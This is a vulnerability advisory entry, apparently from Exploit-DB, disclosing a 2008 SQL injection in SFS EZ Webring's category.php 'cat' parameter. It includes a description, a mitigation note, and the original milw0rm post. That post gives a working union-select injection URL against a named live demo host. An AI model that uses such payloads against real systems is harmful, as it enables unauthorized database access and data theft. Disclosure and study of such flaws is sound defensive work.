SFS EZ Webring [cat] Remote SQL Injection Vulnerability

vendor:

SFS EZ Webring

by:

d3b4g

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: SFS EZ Webring

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SFS EZ Webring [cat] Remote SQL Injection Vulnerability

SFS EZ Webring is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries in the back-end database, allowing the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.

Source

Exploit-DB raw data:

	SFS EZ Webring  [cat] Remote SQL Injection Vulnerability
       ===============================================================


----------------------------------------------------------------
script : SFS EZ Webring 
Risk : High

----------------------------------------------------------------

Discovered by : d3b4g

email : bl4ckend[at]gmail[dot]come

Site. www.bl4ck3nd.info
----------------------------------------------------------------
Vuln:/webring/category.php?cat=[sql]

Demo: http://www.turnkeyzone.com/demos/webring/category.php?cat=-1+union+all+select+1,@@version,3,4,5/*

----------------------------------------------------------------


----------------------------------------------------------------
Greetz: str0ke,All my friends
          
-----------------------------------------------------------------
Proud to be a maldivian :))
=======================

# milw0rm.com [2008-10-31]